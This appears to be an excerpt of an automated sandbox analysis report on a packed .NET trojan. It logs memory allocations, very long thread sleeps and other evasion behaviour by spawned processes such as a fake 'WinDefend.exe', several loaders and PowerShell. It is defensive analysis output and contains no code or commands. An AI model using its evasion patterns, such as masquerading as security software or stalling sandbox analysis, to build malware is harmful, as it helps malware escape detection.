Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 14E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 2E70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 4E70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 5570000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 6570000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 66A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 76A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 79F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 89F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 1130000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 2C10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 4C10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 5350000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 6350000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 6480000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 7480000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 78D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 88D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 98D0000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599524	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598826	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598556	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598433	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598323	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598090	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597745	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597320	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596948	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596604	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596270	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595684	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 593075	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592785	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592635	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592507	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592367	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592249	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591789	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599344
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598906
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598797
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591993
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599877
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599738
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599612
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599476
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599360
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599217
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599110
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598982
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598845
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598704
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 6116	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 2999	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loader.exe	Window / User API: threadDelayed 9489
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Window / User API: threadDelayed 8044
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Window / User API: threadDelayed 1770
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 8122
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 1610
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9626
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9527
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 9073
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Window / User API: threadDelayed 641
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9149
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 575
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8305
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 606

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe TID: 6556	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 5340	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe TID: 2828	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599524s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598826s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598704s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598556s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598433s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598323s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -598090s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597745s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597320s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596948s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596604s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596270s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -596015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -595684s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -200000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99866s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99745s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99628s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99389s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99280s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99171s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -98937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99793s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99647s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99210s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -99094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -98984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -98874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -593075s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592785s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592635s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592507s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592367s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592249s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -592031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -591922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244	Thread sleep time: -591789s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe TID: 7312	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7328	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7556	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7708	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7716	Thread sleep count: 9489 > 30
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7716	Thread sleep count: 346 > 30
Source: C:\Users\user\AppData\Roaming\Loaader.exe TID: 7552	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loaader.exe TID: 7692	Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7736	Thread sleep count: 8122 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7736	Thread sleep count: 1610 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -599015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -598906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -598797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -199062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -198624s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99201s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98978s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98830s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99887s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99521s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -97828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -97670s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -97551s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -97316s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99746s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99421s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99079s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99936s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99742s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99561s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99319s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99180s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99060s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98943s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -98804s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -591993s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99876s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732	Thread sleep time: -99758s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768	Thread sleep count: 9626 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212	Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768	Thread sleep count: 43 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252	Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7504	Thread sleep count: 9073 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599877s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599738s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599612s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599476s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7504	Thread sleep count: 641 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599360s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599217s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -599110s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -598982s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072	Thread sleep time: -598845s >= -30000s
